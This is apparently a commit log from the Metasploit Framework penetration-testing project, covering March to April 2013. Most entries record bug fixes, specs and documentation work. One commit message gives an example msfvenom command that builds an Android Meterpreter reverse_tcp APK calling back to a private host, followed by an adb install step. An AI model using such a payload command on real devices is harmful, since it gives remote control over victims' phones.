906863676e
Fix a logic error in HttpServer
...
When a module is configured to listen on the INADDR_ANY interface, with
a payload that does not have an LHOST option, it attempts to determine
the srvhost from a client socket which would only be available when the
module has included the TcpClient mixin (i.e., it is both passive and
aggressive stance), causing a NameError for the undefined +sock+.
This commit fixes the problem in two ways:
1. It changes the default cli in get_uri to be the module's self.cli,
which should always be set when passive modules would need it (e.g., in
the on_request_uri method).
2. It adds a check to make sure that the calling module has a sock
before trying to get its peerhost. This was @marthieubean's suggested
solution in #1775 .
[Closes #1775 ]
2013-04-29 13:44:58 -05:00
21f8e19d55
Single Payloads Cache Assembled Payload Improperly
...
An earlier change to the framework (prepend_migrate) forced single
payloads to use the internal_generate method of payload.rb.
internal_generate calls build which has a cache to track assembled
payloads. This method assumes that a payload only needs to be
assembled once, with optional values patched in later.
Single payloads do not work this way. Each time they are generated
new assembly source is created with the options hardcoded in.
This fix updates build to use the hashcode of the assembly code as
part of the cache key.
This fixes #7898 -- a bug that prevents a user from generating
multiple variations of a single payload without a restart.
2013-04-29 11:54:53 -04:00
1d9a695d2b
Landing #1772 - Adds phpMyadmin Preg_Replace module (CVE-2013-3238)
...
[Closes #1772 ]
2013-04-28 12:17:16 -05:00
bbd53a2dbd
Add domain to get_cookies
2013-04-26 20:34:21 +01:00
b25b9e769c
Msftidy
2013-04-26 20:30:04 +01:00
1f2cab7aef
Tidyup and getcookies
2013-04-26 20:26:04 +01:00
249a09cd52
Update to metasploit_data_models 0.7.1
...
[#47979793 ]
2013-04-26 13:14:38 -05:00
9ad19ed2bf
Final tidyup
2013-04-26 15:41:28 +01:00
c7ac647e4e
Initial attempt lfi
2013-04-26 14:32:18 +01:00
b1e49e7116
Merge branch 'master' of github.com:rapid7/metasploit-framework into upstream-master
2013-04-25 20:54:28 -05:00
5b0ae1476b
Let's word this a little differently
2013-04-25 20:52:51 -05:00
b58a775af5
Added opt delay to file_dropper
2013-04-25 20:52:51 -05:00
008266a581
Corrects documentation. Thanks Meatballs1
2013-04-25 19:13:16 -05:00
ff87e3622b
Changes made according to feedback from Juan and James
2013-04-25 15:19:44 -05:00
9207ed6532
Msf::Ui::Console::CommandDispatcher::Core#search_modules_sql spec
...
[#47979793 ]
2013-04-25 14:33:13 -05:00
6767eee08a
Add in-line signing
...
Signing the generated APK in the module means users don't have to have
keytool or jarsigner to create a working package.
Example usage:
./msfvenom -p android/meterpreter/reverse_tcp \
LHOST=192.168.99.1 LPORT=2222 -f raw > meterp.apk
adb install ./meterp.apk
2013-04-25 13:57:54 -05:00
24b97137ea
Msf::DBManager Mdm::Module* specs
...
[#47979793 ]
2013-04-25 09:46:53 -05:00
6642545551
Adds new JavaScript function "js_download"
...
"js_download" is a JavaScript function used to download data (text
or binary) from the web server.
2013-04-24 17:36:45 -05:00
93bddd9041
Improved docs and partial specs for Rex::Text
...
Conflicts:
lib/msf/core/modules/loader/base.rb
lib/rex/poly/block.rb
lib/rex/text.rb
2013-04-23 17:24:03 -05:00
cc52619a14
Fix trailing whitespace in zip files
2013-04-23 13:53:38 -04:00
fab1781812
Refactored to send custom commands
2013-04-22 10:04:38 +01:00
6656514616
Msftidy
2013-04-21 14:34:47 +01:00
fc621e8d7e
Parse ssp correctly
2013-04-21 10:55:01 +01:00
83fbc3e46f
Small fix and attribution to gentilkiwi
2013-04-21 00:36:43 +01:00
492b081280
Msf::DBManager::Export#extract_module_detail_info spec
...
[#47979793 ]
2013-04-20 16:44:42 -05:00
cec737d399
tidy and table header
2013-04-20 18:05:47 +01:00
b219a23f00
Refactoring
2013-04-20 18:00:46 +01:00
20849714ac
Add all methods
2013-04-20 17:27:32 +01:00
ddaa09edad
Added msv
2013-04-20 16:31:45 +01:00
83578dec68
Getprivs by default
2013-04-20 14:59:07 +01:00
a23d7bb66f
Add client UI and parse results
2013-04-20 12:20:38 +01:00
5fa81942db
Initial comms
2013-04-19 22:19:50 +01:00
e5befb7094
Msf::DBManager#report_session specs
...
[#47979793 ]
2013-04-19 10:11:33 -05:00
f8fc05bbf9
streamline var assignment
2013-04-18 17:05:28 -04:00
c758831962
streamline var assignment
2013-04-18 17:04:03 -04:00
d9187056c8
msftidy
2013-04-18 13:14:26 -04:00
288111be4e
Fixes RM7883 along with related issue
...
modified: lib/msf/ui/console/command_dispatcher/db.rb
2013-04-18 13:08:32 -04:00
c23cf47d74
Fix RM7896, global show opts has non-eval #{text}
...
thx to mudge for reporting & jduck for properly blaming me.
This change also causes the actual DefaultPromptChar to be displayed vs a hard coded ">"
2013-04-15 22:07:28 -05:00
25fcbd4e70
Landing #1733 , setting a sensible heapsray offset
...
@wchen-r7 says that nobody's using it today, much less relying on the
default, so this should make no functional difference to any browser
exploits.
2013-04-15 16:32:48 -05:00
4d21c7dff5
Landing #1727 , adding @jlee-r7's new fingerprints
2013-04-15 13:49:59 -05:00
7f8040c4e4
Lands #1722 , Rex::Socket comment docs
2013-04-15 13:44:00 -05:00
2c681005c0
Msf::ModuleManager::Cache spec coverage
...
[#47979793 ]
2013-04-15 13:08:12 -05:00
df9c5f4a80
remove unused resources and fix whitespace
2013-04-13 16:22:52 +01:00
2c41ca6598
Merge branch 'encoding_fix' of git://github.com/rsmudge/metasploit-framework
2013-04-12 21:10:44 -05:00
d28db8a2a3
Forgot the comment
2013-04-12 20:21:10 -05:00
f2cbbf43e8
Changes default offset
...
Points to the beginning of the block
2013-04-12 20:19:47 -05:00
32bd812bdb
android meterpreter
2013-04-12 18:57:04 +01:00
2c8ec656ca
Typo
2013-04-11 22:36:08 -05:00
7df80c7aac
Add a couple new IE fingerprints to osdetect.js
2013-04-11 22:29:02 -05:00
6a0b240d10
Add some better docs for Rex::Socket
2013-04-10 12:41:41 -05:00
2949c4a339
enable stage encoding for reverse_http(s)
2013-04-10 12:10:17 -03:00
6a5d318749
Bumping version.
2013-04-10 08:59:56 -05:00
277bc69140
Merge branch 'bug/rm7288-post-rename' of github.com:jlee-r7/metasploit-framework into jlee-r7-bug/rm7288-post-rename
2013-04-08 10:18:09 -05:00
bbce53816c
Merges #1706 , removing gemcache per brandont
...
This has been put off for a long while.
2013-04-05 10:12:04 -05:00
cd86a69090
Have Post::File use shiny new session.fs.file.mv
...
Also adds a quick and dirty test. Verified working on Linux shell, Linux
meterpreter, and Windows x86 and x64 meterpreter.
2013-04-05 01:24:24 -05:00
067140643e
Landing #1579 , meterpreter mv
...
See rapid7/meterpreter/#6
2013-04-04 23:42:31 -05:00
ad46b46684
Landing #1463 , Meatballs' cdecl fixes
2013-04-04 22:58:59 -05:00
6251dd571e
Always use bundler to load gems
2013-04-04 16:41:40 -05:00
06537e0ab1
Remove the gemcache loader and tools
2013-04-03 16:24:56 -05:00
8ceede6460
Remove the gemcache
2013-04-03 16:24:55 -05:00
809969b49f
Merge branch 'master' into feature/patchable-web-vuln-import
2013-04-02 22:38:54 -05:00
47842aa6a2
Fix 'Output is not a module'
...
[#46491831 ]
I missed that Rex::Ui::Text::Output was a class and not a module, so
starting up prosvc fell over when it loaded
rex/ui/text/output/buffer/stdout, which also would screw up
msf/ui/console/command_dispatcher/core.rb where I original added
Rex::Ui::Text::Output::Buffer::Stdout.
2013-04-01 20:16:28 -05:00
f1bc4a76c5
Anemone::Page#links: removed upwards dir traversal
...
[Finishes #47241427 ]
2013-04-02 00:49:40 +03:00
0bb79ba890
Msf::DBManager#import_msf_xml refactor
...
[#46491831 ]
Move Msf::DBManager#import_msf_xml into
Msf::DBManager::ImportMsfXml#import_msf_xml and include
Msf::DBManager::ImportMsfXml to cut down size of the infamous db.rb.
Break up #import_msf_xml to have separate methods for parsing web_forms,
web_pages, and web_vulns. The method for
web_vulns, #import_msf_web_vuln_element is needed so that it can be overridden in
Pro to handle the Pro-only changes to Mdm::WebVuln.
2013-04-01 16:06:40 -05:00
2317e9cced
Fix yard tag warnings
...
[#46491831 ]
2013-03-30 17:13:12 -05:00
7ed2812ec3
Fix Cannot resolve link YARD warnings
...
[#46491831 ]
2013-03-30 16:58:49 -05:00
bc4b87ebd9
Fix Undocumentable method defined on object instance YARD warnings
...
[#46491831 ]
Change code to use format that YARD can document without changing
semantics.
2013-03-30 16:05:12 -05:00
c210260845
Fix Undocumentable method, missing name YARD warning
...
[#46491831 ]
Comments at the start of the file with ## caused YARD to think the
comment was documenting the require call. By removing the ##, the
warning disappeared. I did not determine what is special about ## in
file comments.
2013-03-30 15:32:38 -05:00
e9b183cda2
Anemone::Page#links: restored upwards dir traversal
...
[FIXRM #7853 ]
2013-03-29 23:07:46 +02:00
463725efec
Merge branch 'bug/winrm_poke' of github.com:dmaloney-r7/metasploit-framework into dmaloney-r7-bug/winrm_poke
2013-03-29 09:30:21 -05:00
79a72a18a9
Merge branch 'exe_only_patch' of git://github.com/agix/metasploit-framework
2013-03-27 18:30:07 -05:00
7bf87f3546
Merge branch 'mipsbe_elf' of github.com:jvazquez-r7/metasploit-framework into jvazquez-r7-mipsbe_elf
2013-03-27 11:55:09 -05:00
380f5f56ae
Auxiliary::Web::HTTP#_request: print_error => elog
...
[SEERM #7839 ]
Reverted earlier commit.
2013-03-27 16:36:50 +02:00
a87e414274
fix winrm poke method
2013-03-26 13:05:33 -05:00
a644ceb016
Added support for mipsbe elf
2013-03-26 17:20:43 +01:00
4fff624632
added initial support for ELF misple
2013-03-26 01:08:31 +01:00
509ae76dc9
make sure we grab the workspace for store_local
...
store_local calls report note from db.rb directly instead of going
through the report method. this means we might miss the workspace
causing a stack trace
2013-03-22 16:52:38 -05:00
0634cb9892
Need to avoid badchar 0x00
...
0x00 becomes double null, which functions like a terminator
2013-03-22 13:18:32 -05:00
566806487c
Randomize the "div_container" var because it's global
...
It's best to randomize this variable name because it's global.
2013-03-22 13:16:14 -05:00
1ac31a3e12
Merge branch 'bug/web-path-api-update' of github.com:tasos-r7/metasploit-framework into tasos-r7-bug/web-path-api-update
2013-03-22 12:54:23 -05:00
bf85545b4d
Fix egypt's typo
2013-03-20 17:15:14 -05:00
49963ad4f1
Update MDM in gemcache
2013-03-20 13:23:40 -05:00
cce74246d8
Merge branch 'master' of github.com:rapid7/metasploit-framework
2013-03-19 15:03:24 -05:00
6618c098c4
Merges 'bug/obsolete-activerecord-patch'
...
Not only does this remove the patch, but adds in specs to cover the test
cases that the patch resolved. Verified all steps and landed #1592 before
landing #1611 , so this is complete.
[Closes #1611 ]
2013-03-19 13:10:42 -05:00
d987693238
Merges 'feature/rake-db'
...
Implements rake db tasks for Metasploit Framework. Woot! Verified all
steps listed in #1592 as well.
[Closes #1592 ]
2013-03-19 12:56:59 -05:00
11c38d925b
Auxiliary::Web::Path: Fuzzable API update
...
[FIXRM #7817 ]
Path object was using an outdated fuzzable API which was causing
scan errors.
2013-03-19 18:41:52 +02:00
ad39a5cdc3
Auxiliary::Web::HTTP#_request: elog => print_error
...
[SEERM #7815 ]
Switched form elog to print_error to make reporting bugs easier on users.
2013-03-19 17:18:44 +02:00
1873053a34
Restore win32pe as the default (not _only)
2013-03-18 15:55:01 -05:00
3a183ffa94
Retabbed for consistent whitespace
2013-03-18 15:40:26 -05:00
418a373f6c
Avoid merge conflict over Id SVN tag
2013-03-18 15:39:16 -05:00
afcbaffa2b
Revert "add -R capability like hosts -R"
...
Pulling out the set_rhosts_from_addrs -- that's not required for
grep-like functionality, and adding this method to the global namespace
is undesirable.
This reverts commit 52596ae3b4
2013-03-18 15:28:19 -05:00
91e3f4cca6
Merge 'kernelsmith/msfconsole-grep'
...
Resolved a conflict between grep and go_pro (go_pro was added after
grep). Adds @kernelsmith's grep command. Josh is determined to have
msfconsole be his default shell, it seems.
[Closes #1320 ]
Conflicts:
lib/msf/ui/console/command_dispatcher/core.rb
2013-03-18 14:39:45 -05:00
2075a7b46c
Remove active_record patch
...
[#46141013 ]
Version 3.2.12 of activerecord contains the changes that the original
patch made so the patch is no longer needed.
2013-03-18 11:32:21 -05:00
f1a4fd937a
Specs for activerecord patch
...
[#46141013 ]
Spec the desired behavior for ConnectionPool prior to removing the patch
to sync with upstream 3.2.12.
2013-03-18 11:01:45 -05:00
2604fad164
Allow use of rake db tasks
...
[#46224565 ]
The following rake tasks are added and work similar to how they work in
rails apps:
* db:create
* db:drop
* db:migrate
* db:migrate:status
* db:rollback
* db:schema:dump
* db:schema:load
* db:seed (but no db seeds defined at this time)
* db:setup
* db:version
The hidden task db:test:prepare is also available, which means `rake
spec` can depend on it so that the test database is dropped and
recreated from the development database when running specs (Although
there are yet to be database tests, this branch is in preparation for
that work that will be split between multiple developers.)
2013-03-14 15:46:18 -05:00
f46ec73ff0
Fix up usage help for loot cmd
2013-03-14 14:37:15 -05:00
3dca63fee2
Make it clear that you're deleting all loot
...
You don't get to delete just one chunk of loot.
2013-03-14 14:37:15 -05:00
56611230ff
fixed header
2013-03-14 14:37:15 -05:00
0ca0cd5ee1
loot add/remove command for msfconsole
2013-03-14 14:37:15 -05:00
5967991f6f
Auxiliary::Web#log_*: details[:category] => #name
...
Recent category updates to modules caused variations of vulns of the
same type to be ignored leading to a smaller exploitation surface.
Thus, use the #name of the module as the key instead of the category name.
2013-03-12 19:43:47 +02:00
32bf7cf8f4
Merge remote-tracking branch 'tasos-r7/bug/web-fuzzable-path' into rapid7
...
[Closes #1578 ]
2013-03-12 12:31:32 -05:00
d399093d80
Add Framework side of stdapi.fs.file.mv
...
Add the appropriate methods to Rex side of the FS extension and
the commensurate command dispatcher.
Requires https://github.com/rapid7/meterpreter/pull/6 from the
meterpreter repo as well as compiling fresh DLL for
ext_server_stdapi.
2013-03-12 02:06:38 -04:00
c641ca96c1
Auxiliary::Web::Path.from_model: inputs => form.inputs
...
Fixed uninitialized variable error.
2013-03-11 23:08:41 +02:00
d764740779
Convert user/pass tokens to ASCII in db.rb
...
This commit fixes an Encoding::CompatibilityError incompatible
encoding regexp match (ASCII-8BIT regexp with UTF-8 string) when
sanitizing non-printable tokens from a user/pass string.
The UTF-8 strings are derived from strings passed through the
module.execute RPC call.
2013-03-11 15:02:28 -04:00
f0cee29100
modified CommandDispatcher::Exploit to have the change into account
2013-03-11 18:08:46 +01:00
87f84513bf
Merge pull request #1564 from rapid7/feature/metasploit_data_models-0.6.2
...
Update to metasploit_data_models 0.6.2
2013-03-09 13:49:48 -08:00
bf54b582c9
Condense the decoder commands
2013-03-08 16:29:03 -05:00
7e15788bb5
Auxiliary::Web: updated form of vuln storage in parent
...
#log_fingerprint and #log_resource now create a key in the
parent's #vulns attribute with the name of the vuln type and
store the details of each such vuln under it.
2013-03-08 22:38:23 +02:00
8b5a83c7f5
Remove the DECODER option
2013-03-08 15:25:16 -05:00
ac6065d8f9
Merge remote-tracking branch 'upstream/master' into bug/web-vuln-logging
2013-03-08 21:50:49 +02:00
3422a7c098
Auxiliary::Web: force vuln proof to_s
2013-03-08 21:50:01 +02:00
aceba9fc8a
Revert "escape ticks and spaces in paths"
...
This reverts commit 4c87b1ba36
2013-03-08 14:37:28 -05:00
0a9b00e24c
Apparently missed part of mubix's original changes
...
Used by auxiliary/admin/smb/list_directory
2013-03-07 21:20:46 -06:00
397361f5c6
Update gemcache to metasploit_data_models 0.6.2
2013-03-07 20:41:33 -06:00
db676f1a88
Whitespace at EOL
2013-03-07 18:20:08 -06:00
c3fa62cd59
Whitespace at EOL
2013-03-07 18:16:57 -06:00
725fbea851
Merge pull request #1563 from rapid7/bug/yard-guard
...
[Story #45771305 ]
Conflicts:
Rakefile
2013-03-07 17:35:03 -06:00
43c076ed96
Merge remote-tracking branch 'tasos-r7/bug/web-vuln-logging' into rapid7
...
[Closes #1559 ]
2013-03-07 17:23:59 -06:00
e912bec2db
Update gemcache to metasploit_data_models 0.6.1
...
[#45771305 ]
2013-03-07 14:30:29 -06:00
f05431791f
Merge branch 'dmaloney-r7-feature/ssl/add_cipher_support' into rapid7
2013-03-07 12:54:39 -06:00
27f43d3d1c
Param name goes before type
2013-03-07 12:50:43 -06:00
c41bfa9141
Whitespace
2013-03-07 12:45:01 -06:00
cf3df4b179
Auxiliary::Web::HTTP: added error output
...
Instead of using elog when an HTTP request callback throws an
exception, use the HTTP class' parent #print_error.
2013-03-07 20:14:38 +02:00
06443ea4d0
yarddoc cleanup
2013-03-07 11:52:58 -06:00
007b26d918
dry up enumerators
2013-03-07 11:35:34 -06:00
7332d31523
fix some style things for egypt
2013-03-07 11:11:48 -06:00
c3b3da4254
Merge remote-tracking branch 'upstream/master' into bug/web-vuln-logging
2013-03-06 23:04:10 +02:00
5dff043e3c
Whitespace
2013-03-06 14:52:32 -06:00
d9a6f5f0ca
Merge remote-tracking branch 'upstream/master' into bug/web-vuln-logging
2013-03-06 18:26:18 +02:00
c497d5ffef
Auxiliary::Web: log methods pass vuln info to parent
2013-03-06 18:25:25 +02:00
09fc52f3d9
Merge pull request #1536 from rapid7/feature/active-record-migrator-migrations-paths
...
Use ActiveRecord::Migrator multiple migrations paths support
2013-03-06 08:20:36 -08:00
fac941aae4
Update gemcache with metasploit_data_models 0.6.0
...
[#44034071 ]
2013-03-06 09:59:09 -06:00
24c0da0adb
Merge branch 'rapid7' into doc/cleanup-peparsey
2013-03-05 21:00:26 -06:00
27727df415
Merge branch 'R3dy-psexec-mixin2' into rapid7
2013-03-05 14:36:55 -06:00
3acccd71f7
Whitespace and doc fix
2013-03-05 14:35:27 -06:00
a928e5f963
Whitespace
2013-03-05 14:34:56 -06:00
a64edb33c4
Make code sections look right in docs
2013-03-05 14:34:11 -06:00
f5c23e4b02
fix typo snaffu
2013-03-05 12:35:21 -06:00
1407886e83
Revert "fix a major typo snaffu"
...
This reverts commit c639de7ccc
2013-03-05 12:34:51 -06:00
c639de7ccc
fix a major typo snaffu
2013-03-05 12:33:37 -06:00
6eb334c925
a little more coverage
2013-03-05 00:01:09 -06:00
d909c00036
better spec coverage
2013-03-04 23:43:18 -06:00
9084e2a3bb
Merge branch 'master' of github.com:rapid7/metasploit-framework into rapid7
2013-03-04 21:10:39 -06:00
ac63965e4d
Merge remote-tracking branch 'gerry/nbe_importing_fix' into rapid7
2013-03-04 20:00:50 -06:00
3bb1b2b368
attempt to deal with specs
2013-03-04 19:25:20 -06:00
c121a4e9dc
Some more minor touchups
2013-03-04 18:42:08 -06:00
4e31187f72
Use start.sh to start Pro via go_pro command
...
start.sh (installed with community/pro on apt installs) automatically
starts dependency services (such as postgresql).
2013-03-04 18:35:47 -06:00
8b6b2fbce9
bad error handling fixed
2013-03-04 18:33:03 -06:00
370aed5973
Silence status output, it is distracting
2013-03-04 18:27:22 -06:00
fb0237a180
Fix typo
2013-03-04 18:26:59 -06:00
dc7c02e9e8
still trying to get around this sslv2 thing
2013-03-04 18:18:01 -06:00
246977e0cf
Address openssl sslv2 issues
...
Debian/Ubuntu ship openssl without sslv2 compiled in.
we now check for this ahead of time
2013-03-04 17:39:28 -06:00
12201c519a
make sure we close sockets
2013-03-04 16:34:29 -06:00
13ad5cf150
Merge branch 'master' into feature/ssl/add_cipher_support
2013-03-04 15:07:32 -06:00
c0689a7d43
Merge branch 'master' of github.com:rapid7/metasploit-framework into rapid7
2013-03-04 12:14:33 -06:00
6dcca7df78
Remove duplicated header issues
...
Headers were getting duped back into client config, causing invalid
requests to be sent out
2013-03-04 11:24:26 -06:00
6d811ce4b9
empty passwords should be allowed
2013-03-04 09:09:11 -06:00
0ddc6b3afa
Document Msf::DBManager#initialize_metasploit_data_models
2013-03-02 21:16:02 -06:00
c9a162ac33
Correct return type of Msf::DBManager#migrate.
2013-03-02 21:09:45 -06:00
af4b3fa287
Use ActiveRecord::Migrator multiple migrations paths support
...
[#44034071 ]
ActiveRecord::Migrator has a class attribute, migrations_paths,
specificially for storing a list of different directories that have
migrations in them. ActiveRecord::Migrator.migrations_paths is used in
rake db:load_config, which is a dependency of db:migrate, etc. that is
passed to ActiveRecord::Migrator.migrate. Since migrate supports an
array of directories, and not just a single directory, there is no need
to merge all the migrations paths into one temporary directory as was
previously done.
2013-03-02 20:33:48 -06:00
2e4760c486
Merge pull request #1533 from rapid7/feature/migrations-in-metasploit_data_models
...
All steps passing as described.
2013-03-01 12:54:41 -08:00
b855bd3f3a
Add metasploit_data_models 0.5.1 to gemcache
...
[#44034071 ]
2013-03-01 14:06:58 -06:00
99a8ec593b
Fixing merge conflicts
2013-03-01 20:21:02 +02:00
4212c36566
Fix up basic auth madness
2013-03-01 11:59:02 -06:00
7b8654a71d
Revert "Merge pull request #1534 from tasos-r7/bugfix/web-vuln-confidence"
...
This reverts commit 3840ddccbce1891f0836
2013-03-01 11:41:06 -06:00
3840ddccbc
Merge pull request #1534 from tasos-r7/bugfix/web-vuln-confidence
...
Auxiliary::Web: fixed confidence calculation in log methods
2013-03-01 09:25:07 -08:00
902948e5d3
cleanup options
2013-03-01 11:01:00 -06:00
862b813786
Auxiliary::Web: fixed confidence calc in log methods
2013-03-01 18:33:16 +02:00
239e1934b8
Use migrations from metasploit_data_models
...
[#44034071 ]
metasploit_data_models version 0.5.0 copied the migrations from
metasploit-framework/data/sql/migrate to
metasploit_data_models/db/migrate so that specs could be written the Mdm
models in metasploit_data_models. As part of the specs, :null => false
columns that should be :null => true were discovered, so a new migration
was added, but to metasploit_data_models/db/migrate, so it could be
tested. Instead of replicating migrations back and forth, I'm removing
the migrations completely from metasploit-framework and changing the
default migration path in Msf::DbManager#migration_paths to
MetasploitDataModels.root.join('db', 'migrate').
2013-03-01 09:03:45 -06:00
5a79fcd11e
Ensure we build only one Authorization header
...
Also fixes an issue where Host headers were generated with nil by
preferring the vhost from Client instead of the default nil from
ClientRequest.
2013-02-28 13:47:30 -06:00
18c0bb0ac8
Updates description again
2013-02-28 11:34:48 -06:00
8cb5da0794
One size rules them all.
2013-02-28 11:21:23 -06:00
722e077029
Update generic target
2013-02-28 11:09:52 -06:00
2c013cada8
Update documentation for default values
2013-02-28 11:05:18 -06:00
86d78939ad
Make objId optional
2013-02-28 11:01:15 -06:00
9f35452d73
Beef up the default values for precise alloc size and consistency
2013-02-28 10:35:40 -06:00
425c245771
Axe set_cgi in favor of set_uri
...
They were identical except for a couple of extra bugs in set_cgi.
Also changes ```split("/")``` to ```split("/", -1)```, which behaves
correctly when the input has a seperator at the beginning or end.
2013-02-27 19:13:05 -06:00
b0745b090a
Msf HTTP uses this directly, can't axe it
2013-02-27 17:54:31 -06:00
4edd46216f
Refactor config -> opts
...
Puts all the evasion stuff in the same place as regular HTTP options to
make it easier to deal with.
2013-02-27 17:29:26 -06:00
d5ae54cbb6
More accurate docs
2013-02-27 16:27:37 -06:00
bb02dc43b3
Documentation
2013-02-27 15:34:21 -06:00
312638d6a5
Correct allocation size for IE10
2013-02-27 14:32:39 -06:00
e3f0757304
Improved version thanks to corelanc0d3r
2013-02-27 14:08:57 -06:00
d3b3587660
Merge branch 'rapid7' into dmaloney-r7-feature/http/authv2
2013-02-27 14:01:57 -06:00
6723352b9a
Merge branch 'master' into setstringproperty_spray
2013-02-27 11:17:23 -06:00
2a7b4ee3d8
Merge branch 'master' into setstringproperty_spray
2013-02-27 11:15:52 -06:00
4085fa73c5
Merge branch 'stephenfewer-master'
2013-02-27 11:13:10 -06:00
724b32af17
Fixed the importing of NBE files
2013-02-26 16:55:26 -08:00
7a7dd8975f
Hmm, turns out something actually used that
...
Despite comments to the contrary
2013-02-26 18:16:54 -06:00
29df20996e
Move most of the configuration into ClientRequest
...
Also fixes in-place modification of the query string which resulted in
duplication of the GET parameters when calling #to_s more than once.
2013-02-26 17:38:09 -06:00
f16cec552a
increase timeout with new checks
2013-02-26 14:27:04 -06:00
2ec2489f52
Test for general ssl before testing ciphers
2013-02-26 14:26:14 -06:00
579c11bc69
Set reasonable defaults for more things
...
All current tests are passing now
2013-02-26 14:25:46 -06:00
d7de3b75a4
Format Authorization header like others
...
Also sorts the set_*_header methods
2013-02-26 14:18:20 -06:00
c206ac4998
Set some reasonable defaults
...
Fixes a number of nil deref issues
2013-02-26 14:15:51 -06:00
1cb2717fe7
fix weak and strong cipher enumerators
2013-02-26 14:13:17 -06:00
38af8ba866
Merge branch 'feature/sqli-exploitation-mssql' of github.com:tasos-r7/metasploit-framework into tasos-r7-feature/sqli-exploitation-mssql
2013-02-26 13:41:32 -06:00
d463460da7
Default cgi to true when not given
2013-02-26 13:33:54 -06:00
764bbbb8e5
Whitespace
2013-02-26 13:33:19 -06:00
5e0161d3f7
Reflect new ClientRequst in docs
2013-02-26 13:31:24 -06:00
James Lee
Raphael Mudge
sinn3r
Meatballs
Luke Imhoff
xard4s
Nathan Einwechter
Josh
Tod Beardsley
Tod Beardsley
timwr
scriptjunkie
sinn3r
Rob Fuller
Brandon Turner
Tasos Laskos
David Maloney
jvazquez-r7
Joshua Abraham
RageLtMan
Spencer McIntyre
Samuel Huckins
Gerry Eisenhaur